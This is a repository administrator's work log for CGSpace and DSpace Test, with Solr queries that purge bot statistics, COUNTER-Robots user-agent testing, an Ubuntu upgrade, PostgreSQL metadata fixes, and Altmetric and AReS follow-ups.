  • I added “alanfuu2” to the example spiders file, restarted Tomcat, then made two requests to DSpace Test:
  • +
+
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"alanfuuu1"
+$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"alanfuuu2"
+
    +
  • After committing the changes in Solr I saw one request for “alanfuu1” and no requests for “alanfuu2”:
  • +
+
$ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
+$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
+  <result name="response" numFound="1" start="0">
+$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
+  <result name="response" numFound="0" start="0"/>
+
    +
  • So basically it seems like a win to update the example file with the latest one from Atmire’s COUNTER-Robots list +
      +
    • Even though the “mark by user agent” function is not working (see email to dspace-tech mailing list) DSpace will still not log Solr events from these user agents
    • +
    +
  • +
  • I’m curious how the special character matching is in Solr, so I will test two requests: one with “www.gnip.com” which is in the spider list, and one with “www.gnyp.com” which isn’t:
  • +
+
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"www.gnip.com"
+$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"www.gnyp.com"
+
    +
  • Then commit changes to Solr so we don’t have to wait:
  • +
+
$ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
+$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound 
+  <result name="response" numFound="0" start="0"/>
+$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
+  <result name="response" numFound="1" start="0">
+
    +
  • So the blocking seems to be working because “www.gnip.com” is one of the new patterns added to the spiders file…
  • +
+

2019-11-07

+
    +
  • CCAFS finally confirmed that they do indeed need the confusing new project tag that looks like a duplicate +
      +
    • They had proposed a batch of new tags in 2019-09 and we never merged them due to this uncertainty
    • +
    • I have now merged the changes in to the 5_x-prod branch (#432)
    • +
    +
  • +
  • I am reconsidering the move of cg.identifier.dataurl to cg.hasMetadata in CG Core v2 +
      +
    • The values of this field are mostly links to data sets on Dataverse and partner sites
    • +
    • I opened an issue on GitHub to ask Marie-Angelique for clarification
    • +
    +
  • +
  • Looking into CGSpace statistics again +
      +
    • I searched for hits in Solr from the BUbiNG bot and found 63,000 in the statistics-2018 core:
    • +
    +
  • +
+
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:BUbiNG*' | xmllint --format - | grep numFound
+  <result name="response" numFound="62944" start="0">
+
    +
  • Similar for com.plumanalytics, Grammarly, and ltx71!
  • +
+
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*com.plumanalytics*' | xmllint --format - | grep numFound
+  <result name="response" numFound="28256" start="0">
+$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*Grammarly*' | xmllint --format - | grep numFound
+  <result name="response" numFound="6288" start="0">
+$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*ltx71*' | xmllint --format - | grep numFound
+  <result name="response" numFound="105663" start="0">
+
    +
  • Deleting these seems to work, for example the 105,000 ltx71 records from 2018:
  • +
+
$ http --print b 'http://localhost:8081/solr/statistics-2018/update?stream.body=<delete><query>userAgent:*ltx71*</query><query>type:0</query></delete>&commit=true'
+$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&facet.field=ip&facet.mincount=1&type:0&q=userAgent:*ltx71*' | xmllint --format - | grep numFound
+  <result name="response" numFound="0" start="0"/>
+
    +
  • I wrote a quick bash script to check all these user agents against the CGSpace Solr statistics cores (a simplified sketch of the idea is at the end of this day’s notes) +
      +
    • For years 2010 until 2019 there are 1.6 million hits from these spider user agents
    • +
    • For 2019 alone there are 740,000, over half of which come from Unpaywall!
    • +
    • Looking at the facets I see there were about 200,000 hits from Unpaywall in 2019-10:
    • +
    +
  • +
+
$ curl -s 'http://localhost:8081/solr/statistics/select?facet=true&facet.field=dateYearMonth&facet.mincount=1&facet.offset=0&facet.limit=12&q=userAgent:*Unpaywall*' | xmllint --format - | less
+...
+  <lst name="facet_counts">
+    <lst name="facet_queries"/>
+    <lst name="facet_fields">
+      <lst name="dateYearMonth">
+        <int name="2019-10">198624</int>
+        <int name="2019-05">88422</int>
+        <int name="2019-06">79911</int>
+        <int name="2019-09">67065</int>
+        <int name="2019-07">39026</int>
+        <int name="2019-08">36889</int>
+        <int name="2019-04">36512</int>
+        <int name="2019-11">760</int>
+      </lst>
+    </lst>
+
    +
  • That answers Peter’s question about why the stats jumped in October…
  • +
+
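  • The gist of that quick script is just looping over the statistics cores and the user agent patterns and asking Solr for the counts, something like this (a simplified sketch, not the actual check-spider-hits.sh):

$ for core in statistics statistics-2018 statistics-2017; do for agent in BUbiNG ltx71 Grammarly com.plumanalytics; do echo -n "$core $agent: "; http --print b "http://localhost:8081/solr/$core/select?q=userAgent:*$agent*&rows=0" | xmllint --format - | grep numFound; done; done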

2019-11-08

+
    +
  • I saw a bunch of user agents that have the literal string User-Agent in their user agent HTTP header, for example: +
      +
    • User-Agent: Drupal (+http://drupal.org/)
    • +
    • User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
    • +
    • User-Agent:Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) IKU/7.0.5.9226;IKUCID/IKU;
    • +
    • User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
    • +
    • User-Agent:User-Agent:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET4.0C)IKU/6.7.6.12189;IKUCID/IKU;IKU/6.7.6.12189;IKUCID/IKU;
    • +
    • User-Agent:Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) IKU/7.0.5.9226;IKUCID/IKU;
    • +
    +
  • +
  • I filed an issue on the COUNTER-Robots project to see if they agree to add User-Agent: to the list of robot user agents
  • +
+

2019-11-09

+
    +
  • Deploy the latest 5_x-prod branch on CGSpace (linode19) +
      +
    • This includes the updated CCAFS phase II project tags and the updated spider user agents
    • +
    +
  • +
  • Run all system updates on CGSpace and reboot the server +
      +
    • After rebooting it seems that all Solr statistics cores came back up fine…
    • +
    +
  • +
  • I did some work to clean up my bot processing script and removed about 2 million hits from the statistics cores on CGSpace +
      +
    • The script is called check-spider-hits.sh
    • +
    • After a bunch of tests and checks I ran it for each statistics shard like so:
    • +
    +
  • +
+
$ for shard in statistics statistics-2018 statistics-2017 statistics-2016 statistics-2015 statistics-2014 statistics-2013 statistics-2012 statistics-2011 statistics-2010; do ./check-spider-hits.sh -s $shard -p yes; done
+
    +
  • Open a pull request against COUNTER-Robots to remove unnecessary escaping of dashes
  • +
+

2019-11-12

+
    +
  • Udana and Chandima emailed me to ask why one of their WLE items that is mapped from IWMI only shows up in the IWMI “department” on the Altmetric dashboard + +
  • +
  • Also, while analysing this, I looked through some of the other top WLE items and fixed some metadata issues (adding dc.rights, fixing DOIs, adding ISSNs, etc) and noticed one issue with an item that has an Altmetric score for its Handle (lower) despite it having a correct DOI (with a higher score) +
      +
    • I tweeted the Handle to see if the score would get linked once Altmetric noticed it
    • +
    +
  • +
+

2019-11-13

+
    +
  • The item with a low Altmetric score for its Handle that I tweeted yesterday still hasn’t linked with the DOI’s score +
      +
    • I tweeted it again with the Handle and the DOI
    • +
    +
  • +
  • Testing modifying some of the COUNTER-Robots patterns to use [0-9] instead of \d digit character type, as Solr’s regex search can’t use those
  • +
+
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:"Scrapoo/1"
+$ http "http://localhost:8081/solr/statistics/update?commit=true"
+$ http "http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*" | xmllint --format - | grep numFound
+  <result name="response" numFound="1" start="0">
+$ http "http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/" | xmllint --format - | grep numFound
+  <result name="response" numFound="1" start="0">
+
    +
  • Nice, so searching with regex in Solr with // syntax works for those digits!
  • +
  • I realized that it’s easier to search Solr from curl via POST using this syntax:
  • +
+
$ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:*Scrapoo*&rows=0")
+
    +
  • If the URL parameters include something like “[0-9]” then curl interprets it as a glob range and will make ten requests +
      +
    • You can disable this using the -g option, but there are other benefits to searching with POST, for example it seems that I have less issues with escaping special parameters when using Solr’s regex search:
    • +
    +
  • +
+
$ curl -s 'http://localhost:8081/solr/statistics/select' -d 'q=userAgent:/Postgenomic(\s|\+)v2/&rows=2'
+
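  • For completeness, the -g (globoff) option mentioned above makes curl pass a bracketed pattern in a GET URL through literally instead of expanding it into multiple requests, for example (a quick sketch):

$ curl -s -g 'http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/&rows=0'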
    +
  • I updated the check-spider-hits.sh script to use the POST syntax, and I’m evaluating the feasibility of including the regex search patterns from the spider agent file, as I had been filtering them out due to differences in PCRE and Solr regex syntax and issues with shell handling
  • +
+

2019-11-14

+
    +
  • IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary
  • +
  • I will merge them with our existing list and then resolve their names using my resolve-orcids.py script:
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2019-11-14-combined-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2019-11-14-combined-orcids.txt -o /tmp/2019-11-14-combined-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+
    +
  • I created a pull request and merged them into the 5_x-prod branch +
      +
    • I will deploy them to CGSpace in the next few days
    • +
    +
  • +
  • Greatly improve my check-spider-hits.sh script to handle regular expressions in the spider agents patterns file +
      +
    • This allows me to detect and purge many more hits from the Solr statistics core
    • +
    • I’ve tested it quite a bit on DSpace Test, but I need to do a little more before I feel comfortable running the new code on CGSpace’s Solr cores
    • +
    +
  • +
+

2019-11-15

+
    +
  • Run the new version of check-spider-hits.sh on CGSpace’s Solr statistics cores one by one, starting from the oldest just in case something goes wrong
  • +
  • But then I noticed that some (all?) of the hits weren’t actually getting purged, all of which were using regular expressions like: +
      +
    • MetaURI[\+\s]API\/[0-9]\.[0-9]
    • +
    • FDM(\s|\+)[0-9]
    • +
    • Goldfire(\s|\+)Server
    • +
    • ^Mozilla\/4\.0\+\(compatible;\)$
    • +
    • ^Mozilla\/4\.0\+\(compatible;\+ICS\)$
    • +
    • ^Mozilla\/4\.5\+\[en]\+\(Win98;\+I\)$
    • +
    +
  • +
  • Upon closer inspection, the plus signs seem to be getting misinterpreted somehow in the delete, but not in the select!
  • +
  • Plus signs are special in regular expressions, URLs, and Solr’s Lucene query parser, so I’m actually not sure where the issue is +
      +
    • I tried to do URL encoding of the +, double escaping, etc… but nothing worked
    • +
    • I’m going to ignore regular expressions that have pluses for now
    • +
    +
  • +
  • I think I might also have to ignore patterns that have percent signs, like ^\%?default\%?$
  • +
  • After I added the ignores and did some more testing I finally ran the check-spider-hits.sh on all CGSpace Solr statistics cores and these are the number of hits purged from each core: +
      +
    • statistics-2010: 113
    • +
    • statistics-2011: 7235
    • +
    • statistics-2012: 0
    • +
    • statistics-2013: 0
    • +
    • statistics-2014: 316
    • +
    • statistics-2015: 16809
    • +
    • statistics-2016: 41732
    • +
    • statistics-2017: 39207
    • +
    • statistics-2018: 295546
    • +
    • statistics: 1043373
    • +
    +
  • +
  • That’s 1.4 million hits in addition to the 2 million I purged earlier this week…
  • +
  • For posterity, the major contributors to the hits on the statistics core were: +
      +
    • Purging 812429 hits from curl/ in statistics
    • +
    • Purging 48206 hits from facebookexternalhit/ in statistics
    • +
    • Purging 72004 hits from PHP/ in statistics
    • +
    • Purging 76072 hits from Yeti/[0-9] in statistics
    • +
    +
  • +
  • Most of the curl hits were from CIAT in mid-2019, where they were using GuzzleHttp from PHP, which uses something like this for its user agent:
  • +
+
Guzzle/<Guzzle_Version> curl/<curl_version> PHP/<PHP_VERSION>
+
    +
  • Run system updates on DSpace Test and reboot the server
  • +
+

2019-11-17

+
    +
  • Altmetric support responded about our dashboard question, asking if the second “department” (aka WLE’s collection) was added recently and might not have been in the last harvesting yet +
  • +
  • I finally decided to revert cg.hasMetadata back to cg.identifier.dataurl in my CG Core v2 branch (see #10)
  • +
  • Regarding the WLE item that has a much lower score than its DOI… +
      +
    • I tweeted the item twice last week and the score never got linked
    • +
    • Then I noticed that I had already made a note about the same issue in 2019-04, when I also tweeted it several times…
    • +
    • I will ask Altmetric support for help with that
    • +
    +
  • +
  • Finally deploy 5_x-cgcorev2 branch on DSpace Test
  • +
+

2019-11-18

+
    +
  • I sent a mail to the CGSpace partners in Addis about the CG Core v2 changes on DSpace Test
  • +
  • Then I filed an issue on the CG Core GitHub to let the metadata people know about our progress
  • +
  • It seems like I will do a session about CG Core v2 implementation and limitations in DSpace for the data workshop in December in Nairobi (?)
  • +
+

2019-11-19

+
    +
  • Export IITA’s community from CGSpace because they want to experiment with importing it into their internal DSpace for some testing or something +
      +
    • I had previously sent them an export in 2019-04
    • +
    +
  • +
  • Atmire merged my pull request regarding unnecessary escaping of dashes in regular expressions, as well as my suggestion of adding “User-Agent” to the list of patterns
  • +
  • I made another pull request to fix invalid escaping of one of their new patterns
  • +
  • I ran my check-spider-hits.sh script again with these new patterns and found a bunch more statistics requests that match, for example: +
      +
    • Found 39560 hits from ^Buck/[0-9] in statistics
    • +
    • Found 5471 hits from ^User-Agent in statistics
    • +
    • Found 2994 hits from ^Buck/[0-9] in statistics-2018
    • +
    • Found 14076 hits from ^User-Agent in statistics-2018
    • +
    • Found 16310 hits from ^User-Agent in statistics-2017
    • +
    • Found 4429 hits from ^User-Agent in statistics-2016
    • +
    +
  • +
  • Buck is one I’ve never heard of before, its user agent is:
  • +
+
Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)
+
    +
  • All in all that’s about 85,000 more hits purged, in addition to the 3.4 million I purged last week
  • +
+

2019-11-20

+
    +
  • Email Usman Muchlish from CIFOR to see what he’s doing with their DSpace lately
  • +
+

2019-11-21

+
    +
  • Discuss bugs and issues with AReS v2 that are limiting its adoption +
      +
    • BUG: If you search for items between year 2012 and 2019, then remove some years from the “info product analysis”, they are still present in the search results and export
    • +
    • FEATURE: Ability to add month to date filter?
    • +
    • FEATURE: Add “review status”, “series”, and “usage rights” to search filters
    • +
    • FEATURE: Downloads and views are not included in exports
    • +
    • FEATURE: Add more fields to exports (Abenet will clarify)
    • +
    +
  • +
  • As for the larger features to focus on in the future ToRs: +
      +
    • FEATURE: Unique, linkable URL for a set of search results (discussed with Moayad, he has a plan for this)
    • +
    • FEATURE: Reporting that we talked about in Amman in January, 2019.
    • +
    +
  • +
  • We have a meeting about AReS future developments with Jane, Abenet, Peter, and Enrico tomorrow
  • +
+

2019-11-22

+
    +
  • Skype with Jane, Abenet, Peter, and Enrico about AReS v2 future development +
      +
    • We want to move AReS v2 from dspacetest.cgiar.org/explorer to cgspace.cgiar.org/explorer
    • +
    • We want to maintain a public demo of the vanilla OpenRXV with a subset of data, for example a non-CG community
    • +
    • We want to try to move all issues and milestones to GitHub
    • +
    • I need to try to work with ILRI Finance to pre-pay the AReS Linode server (linode11779072) for 2020
    • +
    +
  • +
+

2019-11-24

+
    +
  • I rebooted DSpace Test (linode19) and it kernel panicked at boot +
      +
    • I looked on the console and saw that it can’t mount the root filesystem
    • +
    • I switched the boot configuration to use the OS’s kernel via GRUB2 instead of Linode’s kernel and then it came up after reboot…
    • +
    • I initiated a migration of the server from the Fremont, CA region to Frankfurt, DE +
        +
      • The migration is going very slowly, so I assume the network issues from earlier this year are still not fixed
      • +
      • I opened a new ticket (13056701) with Linode support, with reference to my previous ticket (11804943)
      • +
      +
    • +
    +
  • +
+

2019-11-25

+
    +
  • The migration of DSpace Test from Fremont, CA (USA) to Frankfurt (DE) region completed +
      +
    • The IP address of the server changed so I need to email CGNET to ask them to update the DNS
    • +
    +
  • +
+

2019-11-26

+
    +
  • Visit CodeObia to discuss future of OpenRXV and AReS +
      +
    • I started working on categorizing and validating the feedback that Jane collated into a spreadsheet last week
    • +
    • I added GitHub issues for eight of the items so far, tagging them by “bug”, “search”, “feature”, “graphics”, “low-priority”, etc
    • +
    • I moved AReS v2 to be available on CGSpace
    • +
    +
  • +
+

2019-11-27

+
    +
  • Minor updates on the dspace-statistics-api +
      +
    • Introduce isort for import sorting
    • +
    • Introduce black for code formatting according to PEP8
    • +
    • Fix some minor issues raised by flake8
    • +
    • Release version 1.1.1 and deploy to DSpace Test (linode19)
    • +
    • I realize that I never deployed version 1.1.0 (with falcon 2.0.0) on CGSpace (linode18) so I did that as well
    • +
    +
  • +
  • File a ticket (242418) with Altmetric about DCTERMS migration to see if there is anything we need to be careful about
  • +
  • Make a pull request against cg-core schema to fix inconsistent references to cg.embargoDate (#13)
  • +
  • Review the AReS feedback again after Peter made some comments +
      +
    • I standardized the GitHub issue labels in both OpenRXV and AReS issue trackers, using labels like “P-low” for priority
    • +
    • I filed another handful of issues in both trackers and added them to the spreadsheet
    • +
    +
  • +
  • I need to ask Marie-Angelique about the cg.peer-reviewed field +
      +
    • We currently use dc.description.version with values like “Internal Review” and “Peer Review”, and CG Core v2 currently recommends using “True” if the field is peer reviewed
    • +
    +
  • +
+

2019-11-28

+
    +
  • File an issue with CG Core v2 project to ask Marie-Angelique about expanding the scope of cg.peer-reviewed to include other types of review, and possibly to change the field name to something more generic like cg.review-status (#14)
  • +
  • More review of AReS feedback +
      +
    • I clarified some of the feedback
    • +
    • I added status of “Issue Filed”, “Duplicate” and “No Action Required” to several items
    • +
    • I filed a handful more GitHub issues in AReS and OpenRXV GitHub trackers
    • +
    +
  • +

December, 2019

2019-12-01

+
    +
  • Upgrade CGSpace (linode18) to Ubuntu 18.04: +
      +
    • Check any packages that have residual configs and purge them:
    • +
    • # dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
    • +
    • Make sure all packages are up to date and the package manager is up to date, then reboot:
    • +
    +
  • +
+
# apt update && apt full-upgrade
+# apt-get autoremove && apt-get autoclean
+# dpkg -C
+# reboot
+
    +
  • Take some backups:
  • +
+
# dpkg -l > 2019-12-01-linode18-dpkg.txt
+# tar czf 2019-12-01-linode18-etc.tar.gz /etc
+
    +
  • Then check all third-party repositories in /etc/apt to see if everything using “xenial” has packages available for “bionic” and then update the sources:
  • +
  • # sed -i 's/xenial/bionic/' /etc/apt/sources.list.d/*.list
  • +
  • Pause the Uptime Robot monitoring for CGSpace
  • +
  • Make sure the update manager is installed and do the upgrade:
  • +
+
# apt install update-manager-core
+# do-release-upgrade
+
    +
  • After the upgrade finishes, remove Java 11, force the installation of bionic nginx, and reboot the server:
  • +
+
# apt purge openjdk-11-jre-headless
+# apt install 'nginx=1.16.1-1~bionic'
+# reboot
+
    +
  • After the server comes back up, remove Python virtualenvs that were created with Python 3.5 and re-run certbot to make sure it’s working:
  • +
+
# rm -rf /opt/eff.org/certbot/venv/bin/letsencrypt
+# rm -rf /opt/ilri/dspace-statistics-api/venv
+# /opt/certbot-auto
+
    +
  • Clear Ansible’s fact cache and re-run the playbooks to update the system’s firewalls, SSH config, etc
  • +
  • Altmetric finally responded to my question about Dublin Core fields +
      +
    • They shared a list of fields they use for tracking, but it only mentions HTML meta tags, and not fields considered when harvesting via OAI
    • +
    • Anyway, there might be some areas where we can improve the HTML meta tags; looking at one item with a DOI, ISSN, etc, I see that we could at least add the status (Open Access) and the journal title
    • +
    • I merged a pull request into the 5_x-prod branch to add status and journal title to the XHTML meta tags
    • +
    +
  • +
+

2019-12-02

+
    +
  • Raise the issue of old, low-quality thumbnails with Peter and the CGSpace team +
      +
    • I suggested that we move manually uploaded thumbnails from the ORIGINAL bundle to the THUMBNAIL bundle
    • +
    • Also replace old thumbnails where an item is available on Slideshare or YouTube because those are easy to get new, high-quality thumbnails for
    • +
    +
  • +
  • Continue testing CG Core v2 implementation on DSpace Test +
      +
    • Compare the OAI QDC representation of a few items on CGSpace vs DSpace Test:
    • +
    +
  • +
+
$ http 'https://cgspace.cgiar.org/oai/request?verb=GetRecord&metadataPrefix=oai_dc&identifier=oai:cgspace.cgiar.org:10568/104030' > /tmp/cgspace-104030.xml
+$ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&metadataPrefix=oai_dc&identifier=oai:cgspace.cgiar.org:10568/104030' > /tmp/dspacetest-104030.xml
+
    +
  • The DSpace Test ones actually now capture the DOI, whereas the CGSpace ones don’t…
  • +
  • And the DSpace Test one doesn’t include review status as dc.description, but I don’t think that’s an important field
  • +
+

2019-12-04

+
    +
  • Peter noticed that there were about seventy items on CGSpace that were marked as private +
      +
    • Some have been withdrawn, but I extracted a list of the forty-eight that were not:
    • +
    +
  • +
+
dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable='f' AND item.in_archive='t' AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
+COPY 48
+

2019-12-05

+ +

2019-12-08

+
    +
  • Enrico noticed that the AReS Explorer on CGSpace (linode18) was down +
      +
    • I only see HTTP 502 in the nginx logs on CGSpace… so I assume it’s something wrong with the AReS server
    • +
    • I ran all system updates on the AReS server (linode20) and rebooted it
    • +
    • After rebooting the Explorer was accessible again
    • +
    +
  • +
+

2019-12-09

+
    +
  • Update PostgreSQL JDBC driver to version 42.2.9 in Ansible playbooks +
      +
    • Deploy on DSpace Test (linode19) to test before deploying on CGSpace in a few days
    • +
    +
  • +
  • Altmetric responded to my question about the WLE item that has a lower score than its DOI +
      +
    • They say that they will “reprocess” the item “before Christmas”
    • +
    +
  • +
+

2019-12-11

+
    +
  • Post message to Yammer about good practices for thumbnails on CGSpace +
      +
    • On the topic of thumbnails, I’m thinking we might want to force-regenerate all PDF thumbnails on CGSpace since we upgraded it to Ubuntu 18.04 and got a new ghostscript (see the filter-media sketch at the end of this list)…
    • +
    +
  • +
  • More discussion about report formats for AReS
  • +
  • Peter noticed that the Atmire reports weren’t showing any statistics before 2019 +
      +
    • I checked and indeed Solr had an issue loading some core last time it was started
    • +
    • I restarted Tomcat three times before all cores came up successfully
    • +
    +
  • +
  • While I was restarting the Tomcat service I upgraded the PostgreSQL JDBC driver to version 42.2.9, which had been deployed on DSpace Test earlier this week
  • +
+
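  • Regarding force-regenerating the PDF thumbnails mentioned above, that would presumably be done with DSpace’s filter-media, something like this (a sketch; double-check the exact plugin name in dspace.cfg first):

$ dspace filter-media -f -p "ImageMagick PDF Thumbnail"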

2019-12-16

  • Visit the CodeObia office to discuss the next phase of OpenRXV/AReS development
    • We discussed using CSV instead of Excel for tabular reports
      • OpenRXV should only have “simple” reports with Dublin Core fields
      • AReS should have this as well as a customized “extended” report that has CRPs, Subjects, Sponsors, etc. from CGSpace
    • We discussed using RTF instead of Word for graphical reports

2019-12-17

  • Start filing GitHub issues for the reporting features on OpenRXV and AReS
    • I created an issue for the “simple” tabular reports on OpenRXV GitHub (#29)
    • I created an issue for the “extended” tabular reports on AReS GitHub (#8)
    • I created an issue for “simple” text reports on the OpenRXV GitHub (#30)
    • I created an issue for “extended” text reports on the AReS GitHub (#9)
  • I looked into creating RTF documents from HTML in Node.js and there is a library called html-to-rtf that works well, but it doesn’t support images
  • Export a list of all investors (dc.description.sponsorship) for Peter to look through and correct:

dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.sponsor", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
+COPY 643
+

2019-12-18

  • Apply the investor corrections and deletions from Peter on CGSpace:

$ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
+$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
+
  • Peter asked about the “Open Government Licence 3.0” that is used by some items
    • I notice that it exists in SPDX as OGL-UK-3.0, so I created a GitHub issue to add this to our controlled vocabulary (#439)
    • I only see two in our database that use this for now, so I will update them:

dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open%';
+         text_value          
+-----------------------------
+ Open Government License 3.0
+ Open Government License 3.0
+(2 rows)
+dspace=# UPDATE metadatavalue SET text_value='OGL-UK-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open Government License 3.0%';
+UPDATE 2
+
  • I created a pull request to add the license and merged it to the 5_x-prod branch (#440)
  • Add three new CCAFS Phase II project tags to CGSpace (#441)
  • Linode said DSpace Test (linode19) had an outbound traffic rate of 73Mb/sec for the last two hours
    • I see some Russian bot active in nginx’s access logs:

# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c MegaIndex.ru 
+27320
+
  • I see they did check robots.txt, and their requests are only going to XMLUI item pages… so I guess I will just leave them alone
  • Peter wrote to ask why this one WLE item does not have an Altmetric attention score when its DOI does
    • I tweeted the item just in case, but Peter said that he had already done so yesterday
    • The item was added six months ago…
    • The DOI has an Altmetric score of 259, but for the Handle it is HTTP 404!
    • I emailed Altmetric support

2019-12-22

  • I ran the dspace cleanup process on CGSpace (linode18) and had an error:

Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(179441) is still referenced from table "bundle".
+
  • The solution is to manually clear that bitstream’s primary bitstream reference from the bundle table:

$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);'
+UPDATE 1
+
+
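  • Presumably the cleanup can then be re-run to finish deleting the orphaned bitstreams; a minimal sketch (the path and the -v verbose flag are assumptions):

$ ~/dspace/bin/dspace cleanup -v
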

2019-12-23

  • Follow up with Altmetric on the issue where an item has a different (lower) score for its Handle despite having a correct DOI (with a higher score)
    • I’ve raised this issue with Altmetric three times this year, and a few weeks ago they said they would re-process the item “before Christmas”
  • Abenet suggested we use cg.reviewStatus instead of cg.review-status, and I agree that we should follow other examples like DCTERMS.accessRights and DCTERMS.isPartOf

2019-12-30

  • Altmetric responded a few days ago about the item that has a different (lower) score for its Handle despite having a correct DOI (with a higher score)
    • She tweeted the repository link and agreed that it didn’t get picked up by Altmetric
    • She said she will add this to the existing ticket about the previous items I had raised an issue about
  • Update Tomcat to version 7.0.99 in the Ansible infrastructure playbooks and deploy it on DSpace Test (linode19)

January, 2020


2020-01-06

  • Open a ticket with Atmire to request a quote for the upgrade to DSpace 6
  • Last week Altmetric responded about the item that had a lower score than its DOI
    • The score is now linked to the DOI
    • Another item that had the same problem in 2019 has now also been linked to the score for its DOI
    • Another item that had the same problem in 2019 has also been fixed

2020-01-07

  • Peter Ballantyne highlighted one more WLE item that is missing the Altmetric score that its DOI has
    • The DOI has a score of 259, but the Handle has no score at all
    • I tweeted the CGSpace repository link

2020-01-08

  • Export a list of authors from CGSpace for Peter Ballantyne to look through and correct:

dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
+COPY 68790
+
  • As I always have encoding issues with files Peter sends, I tried to convert it to some Windows encoding, but got an error:

$ iconv -f utf-8 -t windows-1252 /tmp/2020-01-08-authors.csv -o /tmp/2020-01-08-authors-windows.csv
+iconv: illegal input sequence at position 104779
+
  • According to this trick, the troublesome character is on line 5227:

$ awk 'END {print NR": "$0}' /tmp/2020-01-08-authors-windows.csv                                   
+5227: "Oue
+$ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
+00000000: 22  "
+00000001: 4f  O
+00000002: 75  u
+00000003: 65  e
+00000004: cc  .
+00000005: 81  .
+00000006: 64  d
+00000007: 72  r
+
  • According to the blog post linked above, the troublesome character is probably the “High Octet Preset” (81), which vim identifies (using ga on the character) as:

<e>  101,  Hex 65,  Octal 145 < ́> 769, Hex 0301, Octal 1401
  • If I understand the situation correctly, it sounds like this means that the character is not actually encoded as UTF-8, so it’s stored incorrectly in the database…
  • Other encodings like windows-1251 and windows-1257 also fail on different characters like “ž” and “é” that are legitimate UTF-8 characters
  • Then there is the issue of Russian, Chinese, etc. characters, which are simply not representable in any of those encodings
  • I think the solution is to upload it to Google Docs, or just send it to him and deal with each case manually in the corrections he sends me
  • Re-deploy DSpace Test (linode19) with a fresh snapshot of the CGSpace database and assetstore, using the 5_x-prod (no CG Core v2) branch

2020-01-14

  • I checked the yearly Solr statistics sharding cron job that should have run on 2020-01 on CGSpace (linode18) and saw that there was an error
